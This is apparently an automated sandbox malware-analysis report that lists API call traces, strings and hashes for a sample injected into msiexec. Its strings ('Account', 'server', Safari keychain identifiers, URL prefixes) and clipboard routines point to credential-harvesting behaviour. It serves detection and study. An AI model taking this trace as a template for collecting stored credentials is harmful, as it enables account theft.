  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
APIs
• memset.MSVCRT ref: 004301AD
• memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
Similarity
• API ID: memcpymemset
• String ID:
• API String ID: 1297977491-0
APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
APIs
• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
APIs
• FreeLibrary.KERNELBASE(?), ref: 0044DEB6
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                            • String ID:
                                                                            • API String ID: 3604893535-0
                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                            • API String ID: 2780580303-317687271
                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 1213725291-0
                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                            • free.MSVCRT ref: 00418370
                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                            • String ID: OsError 0x%x (%u)
                                                                            • API String ID: 2360000266-2664311388
                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • memset.MSVCRT ref: 0040265F
                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                            • API String ID: 577499730-1134094380
                                                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                            • API String ID: 2787044678-1921111777
                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
